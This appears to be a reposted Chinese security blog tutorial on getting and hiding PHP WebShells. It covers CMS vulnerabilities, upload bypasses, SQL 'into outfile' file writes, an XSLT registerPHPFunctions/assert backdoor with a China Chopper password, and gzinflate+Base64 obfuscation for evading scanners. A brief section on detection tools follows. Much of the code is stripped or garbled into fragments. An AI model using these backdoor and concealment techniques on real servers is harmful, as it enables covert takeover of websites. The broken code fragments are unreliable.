phpcms手册(千变万化的WebShell)

wufei123 发布于 2024-01-22 阅读(151)

第一节 CMS获取WebShell1.1、什么是CMS?CMS是Content Management System的缩写,意为"内容管理系统"内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。

对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解1.2、常见的CMS有哪些?asp平台:动易CMS、创力CMS、科汛CMS、新云CMS;php平台:phpcms、织梦CMS、帝国CMS、php168 CMS;

ASP.NET平台:Zoomla!逐浪CMS、动易CMS、风讯CMS、We7 CMS;1.3、CMS获取WebShell方法公开漏洞途径:以PHPCMS为例:我们可以利用搜索引擎来查找互联网上公开的通用漏洞,如果目标站点并没有进行修复,即可轻松获取WebShell。

代码审计途径:有很多CMS其实是开源的,我们可以在官网下载到源码,然后进行代码审计,自己挖掘漏洞, 来获取WebShell关于代码审计的教程篇幅太长,这里就不做更多介绍,我会单独写一篇系列文章进行讲解第二节 非CMS获取WebShell

2.1、上传漏洞获取WebShell文件上传漏洞主要有以下几种情况:MIME类型绕过漏洞文件扩展名绕过漏洞文件内容检测绕过类上传漏洞空字节截断目录路径检测绕过类上传漏洞解析导致的文件上传漏洞:IIS6.0站上的目录路径检测解析绕过上传漏洞

Apache站上的解析缺陷绕过上传漏洞htaccess文件上传解析漏洞还有一些编辑器存在漏洞导致的文件上传,比如FCK编辑器具体请看i春秋学院视频,还可以做实验,链接如下:非法文件上传漏洞技术解析及防御。

2.2、SQL注入获取WebShell利用SQL注入攻击获取WebShell其实就是在向服务器写文件(注意:这里我们需要得到网站的绝对路径)所有常用的关系数据库管理系统(RDBMS)均包含内置的向服务器文件系统写文件的功能。

MySQL:select into outfile(dumpfile) //MySQL写文件命令例如:select "" into outfile "F:\\www\\test.php";

那么其它关系数据库管理系统同样的原理写文件,就不在过多介绍了2.3、数据库备份获取WebShell利用数据库备份获取WebShell,恰好i春秋有相关的实验,我也发过相关的教程,这里就不介绍了,大家去看看吧,第三步就是利用数据库备份拿WebShell。

2015中国网络安全大赛:越权访问真题配套实验地址:(进去后选择越权访问点击START就行了)2015中国网络安全大赛第三节 基于xslt转换的WebShell3.1、什么是xslt?在了解什么是xslt之前,我们需要先了解什么是xsl,XSL是可扩展样式表语言的外语缩写,是一种用于以可读格式呈现 XML(标准通用标记语言的子集)数据的语言。

XSL - 不仅仅是样式表语言XSL 包括三部分:XSLT - 一种用于转换 XML 文档的语言XPath - 一种用于在 XML 文档中导航的语言XSL-FO - 一种用于格式化 XML 文档的语言那么看到这里相信大家已经了解到xslt是xsl的一部分。

3.2、在PHP下基于xslt转换来隐藏WebShell怎么在php下使用xsl呢?我教大家的都是可以自己学习的方法,既然要使用php,我们肯定要去看php的官方手册,我们去搜索xsl

定位到XSLTProcessor类,可以发现registerPHPFunctions方法,如果你根本不懂这些方法,不要紧,看后面的英文介绍,如果你说你不懂英文,不要紧啊,不有google翻译,拿去翻译一下

Enables the ability to use PHP functions as XSLT functions我们点进去,可以发现里面有事例,很简单,建议大家去看看啊PHP手册地址见下面的参考资料。

我们先来看看官方事例:

xmlns:php="http://php.net/xsl"> //这个命名空间URI表示php专用的xsl函数支持

indent="yes"/>

Users

> //php:function(assert,string(.))表示将匹配节点的文本作为参数传递给php的assert函数。

那么搞懂了以上这些知识,那就很简单了为了避免xml的转义问题,进行一次assert嵌套,最终WebShell如下:。

;$xmldoc = DOMDocument::loadXML($xml);$xsldoc = DOMDocument::loadXML($xsl);$proc = new

XSLTProcessor();$proc->registerPHPFunctions();$proc->importStyleSheet($xsldoc);$proc->transformToXML($xmldoc);

?>可以直接用菜刀连接:(密码:zusheng)

参考资料:PHP官方手册:http://php.net/manual/zh/第四节 代码混淆隐藏WebShell代码混淆隐藏WebShell也就是通过编码和压缩恶意代码的方式来隐藏WebShell这里我们使用gzinflate+Base64加密,来隐藏WebShell。

可以直接用菜刀连接:(密码:zusheng)

第五节 防御篇-查杀WebShell5.1、WebShell的分类

5.2、安全工具D盾:

下载地址:免费下载360主机卫士:提供在线监测,把网站打包成zip上传就行了http://zhuji.360.cn/backdoor小实验学完上述知识,大家是不是想动手来试试了呢,来个小实验我们先新建一个php文件。

文件内容如下:1),@array(user=>2),system);

}?>

使用gzinflate+Base64加密,来隐藏WebShell使之能正常运行结束语作为一名黑客,在你取得成功的问题上没有什么诀窍可寻,只有你越努力工作,你才能越接近成功参考链接http://bbs.ichunqiu.com/thread-8907-1-1.html?from=bkycold。

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。

若不同意以上警告信息请立即退出浏览!!! 敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。

违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

亲爱的读者们,感谢您花时间阅读本文。如果您对本文有任何疑问或建议,请随时联系我。我非常乐意与您交流。

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。